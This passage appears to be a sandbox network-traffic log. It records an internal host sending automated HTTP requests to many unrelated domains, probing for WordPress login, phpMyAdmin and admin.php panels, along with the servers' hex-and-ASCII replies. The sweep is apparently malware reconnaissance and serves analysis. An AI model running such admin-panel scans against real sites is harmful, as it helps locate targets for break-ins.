3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 3e 23 63 6f 6e 74 65 6e 74 2d 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 20 20 20 20 7d 3c 2f 73 74 79 6c 65 3e 3c 64 69 76 3e 46 6f 72 20 66 75 6c 6c 20 66 75 6e 63 74 69 6f 6e 61 6c 69 74 79 20 6f 66 20 74 68 69 73 20 73 69 74 65 20 69 74 20 69 73 20 6e 65 63 65 73 73 61 72 79 20 74 6f 20 65 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 2e 20 48 65 72 65 20 61 72 65 20 74 68 65 20 3c 61 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 65 6e 61 62 6c 65 2d 6a 61 76 61 73 63 72 69 70 74 2e 63 6f 6d 2f 22 3e 69 6e 73 74 72 75 63 74 69 6f 6e 73 20 68 6f 77 20 74 6f 20 65 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 20 69 6e 20 79 6f 75 72 20 77 65 Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></title><noscript><style>#content-main { display: none; }</style><div>For full functionality of this site it is necessary to enable JavaScript. Here are the <a target="_blank" rel="noopener noreferrer" href="https://www.enable-javascript.com/">instructions how to enable JavaScript in your we
Nov 30, 2023 11:22:42.344489098 CET	1340	IN	Data Raw: 62 20 62 72 6f 77 73 65 72 3c 2f 61 3e 2e 3c 2f 64 69 76 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 76 61 72 20 61 62 70 20 3d 20 75 6e 64 65 66 69 6e 65 64 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f Data Ascii: b browser</a>.</div></noscript><script>var abp = undefined;</script><script src="/px.js?ch=1&abp=1"></script><script src="/px.js?ch=2&abp=1"></script><script>!function(){"use strict";var e={49040:function(e,t,n){function r(e){return!0===e\|\|"tr
Nov 30, 2023 11:22:42.344500065 CET	378	IN	Data Raw: 2e 6c 6f 67 4d 65 73 73 61 67 65 28 65 2e 4c 65 76 65 6c 2e 45 52 52 4f 52 2c 74 29 7d 7d 2c 7b 6b 65 79 3a 22 77 61 72 6e 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 6c 6f 67 4d 65 73 73 61 67 65 28 65 Data Ascii: .logMessage(e.Level.ERROR,t)}},{key:"warn",value:function(t){return e.logMessage(e.Level.WARN,t)}},{key:"info",value:function(t){return e.logMessage(e.Level.INFO,t)}},{key:"debug",value:function(t){return e.logMessage(e.Level.DEBUG,t)}},{key:"
Nov 30, 2023 11:22:42.344525099 CET	1340	IN	Data Raw: 28 65 29 7b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 65 29 74 72 79 7b 72 65 74 75 72 6e 20 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 29 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 20 61 2e 65 72 72 6f 72 28 74 29 Data Ascii: (e){if("object"===typeof e)try{return JSON.stringify(e)}catch(t){return a.error(t),e}return Array.isArray(e)?e.toString():e}a.Level={NONE:"NONE",ERROR:"ERROR",WARN:"WARN",INFO:"INFO",DEBUG:"DEBUG",TRACE:"TRACE"},a.Severity={NONE:0,ERROR:1,WARN
Nov 30, 2023 11:22:42.344537973 CET	1340	IN	Data Raw: 2c 52 45 41 43 54 5f 41 50 50 5f 56 45 52 49 5a 4f 4e 5f 46 45 45 44 5f 50 41 52 54 4e 45 52 5f 43 50 3a 22 6e 61 6d 65 61 64 6d 69 6e 5f 70 61 72 6b 5f 64 6d 5f 32 39 30 33 5f 67 6f 64 61 64 64 79 22 2c 52 45 41 43 54 5f 41 50 50 5f 56 45 52 49 Data Ascii: ,REACT_APP_VERIZON_FEED_PARTNER_CP:"nameadmin_park_dm_2903_godaddy",REACT_APP_VERIZON_FEED_ENABLE:"true",REACT_APP_VERIZON_FEED_PROXY:"https://api.aws.parking.godaddy.com",REACT_APP_FORWARDER_LANDER_URL_DAN:"https://dan.com/buy-domain/{DOMAIN}
Nov 30, 2023 11:22:42.344604015 CET	1340	IN	Data Raw: 72 61 66 66 69 63 5f 74 79 70 65 3d 54 44 46 53 5f 42 49 4e 4e 53 26 74 72 61 66 66 69 63 5f 69 64 3d 62 69 6e 6e 73 26 7b 51 55 45 52 59 7d 22 2c 54 44 46 53 5f 41 46 54 45 52 4e 49 43 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 66 74 65 72 6e Data Ascii: raffic_type=TDFS_BINNS&traffic_id=binns&{QUERY}",TDFS_AFTERNIC:"https://www.afternic.com/forsale/{DOMAIN}?utm_source=TDFS_DASLNC&utm_medium=DASLNC&utm_campaign=TDFS_DASLNC&traffic_type=TDFS_DASLNC&traffic_id=daslnc&{QUERY}"},FORWARDER_LANDER_A
Nov 30, 2023 11:22:42.344620943 CET	1340	IN	Data Raw: 53 79 6d 62 6f 6c 26 26 22 73 79 6d 62 6f 6c 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 65 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b Data Ascii: Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},r(e)}n.d(t,{Z:function(){return r}})}},t={};function n(r){va
Nov 30, 2023 11:22:42.344634056 CET	1340	IN	Data Raw: 74 72 69 62 75 74 65 28 22 73 72 63 22 29 3d 3d 72 7c 7c 66 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 77 65 62 70 61 63 6b 22 29 3d 3d 74 2b 61 29 7b 75 3d 66 3b 62 72 65 61 6b 7d 7d 75 7c 7c 28 63 3d 21 30 2c 28 75 3d 64 6f 63 Data Ascii: tribute("src")==r\|\|f.getAttribute("data-webpack")==t+a){u=f;break}}u\|\|(c=!0,(u=document.createElement("script")).charset="utf-8",u.timeout=120,n.nc&&u.setAttribute("nonce",n.nc),u.setAttribute("data-webpack",t+a),u.src=r),e[r]=[o];var s=functi
Nov 30, 2023 11:22:42.344655037 CET	1340	IN	Data Raw: 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 2c 6f 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 6c 69 6e 6b 22 29 3b 61 2e 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 2c 61 2e 74 79 70 65 3d 22 74 65 Data Ascii: tion(e,t,n,r,o){var a=document.createElement("link");a.rel="stylesheet",a.type="text/css",a.onerror=a.onload=function(n){if(a.onerror=a.onload=null,"load"===n.type)r();else{var i=n&&("load"===n.type?"missing":n.type),u=n&&n.target&&n.target.hr
Nov 30, 2023 11:22:42.344667912 CET	1340	IN	Data Raw: 69 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 61 3d 69 5b 64 5d 2c 6e 2e 6f 28 65 2c 61 29 26 26 65 5b 61 5d 26 26 65 5b 61 5d 5b 30 5d 28 29 2c 65 5b 61 5d 3d 30 7d 2c 72 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 61 72 6b 69 6e 67 5f 6c Data Ascii: i.length;d++)a=i[d],n.o(e,a)&&e[a]&&e[a][0](),e[a]=0},r=self.webpackChunkparking_lander=self.webpackChunkparking_lander\|\|[];r.forEach(t.bind(null,0)),r.push=t.bind(null,r.push.bind(r))}(),function(){var e=n(40077),t={DAN:"DAN",TDFS_GD:"TDFS_GD
Nov 30, 2023 11:22:42.344680071 CET	1188	IN	Data Raw: 61 6d 65 29 29 3b 73 28 65 2c 61 2e 45 52 52 4f 52 5f 49 4e 56 41 4c 49 44 5f 53 54 41 54 55 53 5f 43 4f 44 45 29 7d 65 6c 73 65 7b 76 61 72 20 72 3d 65 2e 78 68 72 2e 72 65 73 70 6f 6e 73 65 2e 6c 61 6e 64 69 6e 67 50 61 67 65 3b 69 66 28 72 20 Data Ascii: ame));s(e,a.ERROR_INVALID_STATUS_CODE)}else{var r=e.xhr.response.landingPage;if(r in c)u(e,r),window.location.replace(_(r,e.domainName));else{if(r!==t.PARKING)throw new Error("not expected lander:"+r);u(e,r),function(){window.LANDER_SYSTEM="CP

Session ID	Source IP	Source Port	Destination IP	Destination Port
166	192.168.2.4	63038	194.63.248.47	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:42.245096922 CET	223	OUT	GET /wp-login.php HTTP/1.1 Host: z-a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:42.445230961 CET	536	IN	HTTP/1.1 302 Found Date: Thu, 30 Nov 2023 10:22:42 GMT Server: Apache/2.4.25 (Debian) Location: https://z-a.com/wp-login.php Content-Length: 285 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 7a 2d 61 2e 63 6f 6d 2f 77 70 2d 6c 6f 67 69 6e 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 7a 2d 61 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://z-a.com/wp-login.php">here</a>.</p><hr><address>Apache/2.4.25 (Debian) Server at z-a.com Port 80</address></body></html>
Nov 30, 2023 11:22:44.050416946 CET	259	OUT	GET /wp-admin/ HTTP/1.1 Host: z-a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://z-a.com/wp-login.php
Nov 30, 2023 11:22:44.251264095 CET	530	IN	HTTP/1.1 302 Found Date: Thu, 30 Nov 2023 10:22:44 GMT Server: Apache/2.4.25 (Debian) Location: https://z-a.com/wp-admin/ Content-Length: 282 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 7a 2d 61 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 7a 2d 61 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://z-a.com/wp-admin/">here</a>.</p><hr><address>Apache/2.4.25 (Debian) Server at z-a.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
167	192.168.2.4	63083	145.14.30.248	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:42.416397095 CET	214	OUT	GET /pma/ HTTP/1.1 Host: san.ee Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:42.633344889 CET	828	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 30 Nov 2023 10:22:42 GMT Content-Type: text/html Content-Length: 494 Last-Modified: Tue, 28 Nov 2023 01:18:59 GMT Connection: keep-alive Keep-Alive: timeout=20 ETag: "65654003-1ee" Cache-Control: no-cache Accept-Ranges: bytes Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 68 74 74 70 22 20 6e 61 6d 65 3d 22 68 74 74 70 22 20 76 61 6c 75 65 3d 22 35 30 30 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 68 74 74 70 73 22 20 6e 61 6d 65 3d 22 68 74 74 70 73 22 20 76 61 6c 75 65 3d 22 35 30 30 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 70 72 65 66 65 72 5f 68 74 74 70 73 22 20 6e 61 6d 65 3d 22 70 72 65 66 65 72 5f 68 74 74 70 73 22 20 76 61 6c 75 65 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 76 61 72 20 70 72 6f 74 6f 63 6f 6c 3d 22 68 74 74 70 73 3a 22 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 70 6f 72 74 3d 35 30 30 31 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 55 52 4c 3d 70 72 6f 74 6f 63 6f 6c 2b 22 2f 2f 22 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 22 3a 22 2b 70 6f 72 74 2b 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 0a 20 20 20 20 20 20 20 20 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 55 52 4c 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html> <body> <input type="hidden" id="http" name="http" value="5000"> <input type="hidden" id="https" name="https" value="5001"> <input type="hidden" id="prefer_https" name="prefer_https" value="true"> </body> <script type="text/javascript"> var protocol="https:"; var port=5001; var URL=protocol+"//"+location.hostname+":"+port+location.pathname+location.search; location.replace(URL); </script></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
168	192.168.2.4	63108	213.171.212.244	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:42.416409016 CET	222	OUT	GET /wp-login.php HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:42.597553968 CET	443	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:22:42 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/wp-login.php Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Nov 30, 2023 11:22:44.581161022 CET	257	OUT	GET /wp-admin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://gco.uk/wp-login.php
Nov 30, 2023 11:22:44.761934996 CET	440	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:22:44 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/wp-admin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
169	192.168.2.4	63717	157.7.44.171	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:42.657321930 CET	224	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: gmaso.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:42.916174889 CET	432	IN	HTTP/1.1 404 Not Found Date: Thu, 30 Nov 2023 10:22:42 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 209 Connection: keep-alive Server: Apache Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 50 68 70 4d 79 41 64 6d 69 6e 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /PhpMyAdmin/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
170	192.168.2.4	64635	68.183.34.12	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:42.712559938 CET	217	OUT	GET / HTTP/1.1 Host: www.hul.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:42.894201994 CET	1340	IN	HTTP/1.1 200 OK Date: Thu, 30 Nov 2023 10:22:42 GMT Server: Apache/2.4.57 (Ubuntu) Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 30 Nov 2023 10:22:42 +0000 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=26dt060df5ch5ktceobopp37u1; path=/ Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 1625 Content-Type: text/html; charset=UTF-8 Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 57 5b 53 db 38 14 7e 4e 7e 85 ea 87 02 d3 3a 26 b0 bd 0c 24 d9 6d 21 a5 cc 50 ca 94 30 dd 9d e9 8c 47 b6 e5 58 45 96 8c 24 13 32 db fd ef 7b 74 b1 e3 00 29 30 6d a2 cb b9 7c e7 e8 dc 32 7a 71 fc f5 68 f6 cf c5 14 15 ba 64 e8 e2 ea e3 d9 e9 11 0a c2 28 fa be 7f 14 45 c7 b3 63 f4 f7 e7 d9 97 33 34 1c ec a2 4b 2d 69 aa a3 68 7a 1e a0 a0 d0 ba 3a 88 a2 c5 62 31 58 ec 0f 84 9c 47 b3 6f d1 9d 91 32 34 6c 7e 19 2a cb 33 c8 74 16 4c fa 23 73 36 e9 f7 47 2f c2 10 2d 55 19 a1 30 9c b8 5d 51 b3 41 2a 06 f5 b5 3d 02 4a 82 b3 49 bf 37 d2 54 33 32 f9 4e 58 2a 4a 82 b4 40 9f af ce 1c e1 28 72 77 40 54 12 8d 91 01 14 92 9b 9a de 8e 03 5a e2 39 d1 42 b0 04 cb 00 a5 82 6b c2 f5 38 e0 22 40 91 61 60 94 5f 23 49 d8 38 50 7a c9 88 2a 08 d1 01 d2 cb 8a 8c 03 4d ee 74 94 2a 15 a0 42 92 bc a1 88 12 ac c8 c0 1e 47 ad 4a 8e 4b 60 c8 88 4a 25 ad 34 15 3c 40 0c f3 f9 38 20 bc a3 75 65 da 2f 74 49 b0 4c 0b 94 0b 89 c8 2d 91 4b 5d 50 3e 37 c6 1b 34 58 93 ac 2b be 6b d1 85 c4 f3 12 af d9 12 a6 38 2d c8 26 86 e9 5d 45 25 51 1d 8e 70 b8 89 f6 c8 91 84 33 70 40 87 c1 7a c2 3c d9 21 4a 0b 2c 15 d1 e3 ab d9 a7 f0 bd 17 e3 ac ee 7a ed 27 be c5 ee 14 1e bb d7 33 0f 0b 5f 79 cd 53 e3 1c 84 b3 2c 56 d6 01 b1 96 84 67 6a fb 9a 2c 17 42 66 6a 07 c8 fe ed c1 47 ef 16 4b b4 a0 99 2e d0 18 65 22 ad 4b 40 32 80 b7 9c 32 62 96 1f 97 a7 d9 f6 56 89 29 8f 3d cc ad 9d 81 c8 73 c0 f6 dd 70 1d 36 32 9c 82 df 09 59 43 12 e7 12 de 72 6b a7 e5 77 66 c4 4a a6 20 a3 1b ec 73 21 e6 0c 22 41 94 91 63 8d 72 a2 d3 e2 48 94 95 e0 20 fc cf 82 fd 78 f7 86 f0 f0 e4 e3 8f 3f de de c0 3a 78 d5 98 f9 2a 80 a3 39 11 70 68 6f d3 b2 d2 b0 be 31 4b 67 cd 8f dd 77 6f 86 66 4b 33 b8 98 9d 7e 99 5e 4e bf 9d 4e 2f e3 93 6f 1f 2e 3e c7 bb 70 45 ee 2a 21 2d e1 1b d8 2d cc 22 78 65 5d 66 c5 17 e6 60 ff ed 6e 60 4d 71 10 07 e0 9e 0f 1a 32 31 a9 35 01 cb 65 ba f5 ba 63 e1 ce 66 52 2b 77 eb b5 fd 72 64 92 e8 5a 72 94 63 a6 88 39 f8 0f fe 9b 94 ed 8d 22 27 f1 e9 d0 e8 ad 11 f7 47 91 4b f6 51 22 b2 25 12 fc 4c e0 0c b2 aa 79 37 35 1c dc 0c 72 d8 a9 ed 9d 60 32 ca e8 2d a2 70 bf 90 b8 aa 88 34 81 66 cf 52 86 95 82 64 cb 5c e8 35 64 73 2a 71 9e 93 38 c1 9c 3b 6a b8 2c 86 93 11 f6 e9 1d 05 93 4e 49 c1 93 97 3c 51 d5 61 f7 33 59 02 c2 a1 e3 6c b8 ba 01 e1 34 38 09 00 90 96 73 04 4e f5 45 48 45 0d 02 26 e6 02 88 f3 00 61 06 c9 75 b2 c6 b6 86 d5 50 9a 1c 33 70 8c 2d 11 18 b3 66 14 c7 b7 b1 a9 6c 16 53 af 73 61 ea 9a 6a 8f db 2b ef 1b 73 1b 53 4d ca 2e ca c8 c3 34 32 29 cf c8 5d 9c d6 52 da 84 69 b1 16 50 7b 1d 20 8f 64 ed 6f 93 8a c6 57 49 bd 0c a1 Data Ascii: W[S8~N~:&$m!P0GXE$2{t)0m\|2zqhd(Ec34K-ihz:b1XGo24l~3tL#s6G/-U0]QA=JI7T32NXJ@(rw@TZ9Bk8"@a`_#I8PzMtBGJK`J%4<@8 ue/tIL-K]P>74X+k8-&]E%Qp3p@z<!J,z'3_yS,Vgj,BfjGK.e"K@22bV)=sp62YCrkwfJ s!"AcrH x?:x9pho1KgwofK3~^NN/o.>pE!--"xe]f`n`Mq215ecfR+wrdZrc9"'GKQ"%Ly75r`2-p4fRd\5dsq8;j,NI<Qa3Yl48sNEHE&auP3p-flSsaj+sSM.42)]RiP{ doWI
Nov 30, 2023 11:22:42.894221067 CET	833	IN	Data Raw: ce a9 30 13 26 71 07 55 51 6d 02 70 9f 74 05 01 6e 90 b9 41 ee a6 71 cf 23 88 56 ee f2 0b ff dd 6f a2 d2 6a 7d 90 d1 21 e6 98 2d 35 4d 95 cd ed 1a 6a 03 00 f8 a9 82 8d 05 6e 15 c3 4f 95 42 84 e2 1a a7 29 98 71 f5 21 1c be df df 1b be 7b 0b d5 f8 Data Ascii: 0&qUQmptnAq#Voj}!-5MjnOB)q!{.&sbqm\808&ron#CI9b>;'rzlzpmu&:jrkA#FhzV(D-f\!5*9Zhc<

Session ID	Source IP	Source Port	Destination IP	Destination Port
171	192.168.2.4	64660	64.190.63.111	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:42.729512930 CET	216	OUT	GET /pma/ HTTP/1.1 Host: apee.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:42.920639038 CET	142	IN	HTTP/1.1 439 date: Thu, 30 Nov 2023 10:22:42 GMT content-length: 0 server: NginX

Session ID	Source IP	Source Port	Destination IP	Destination Port
172	192.168.2.4	63765	213.171.212.244	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:42.819655895 CET	219	OUT	GET /admin.php HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
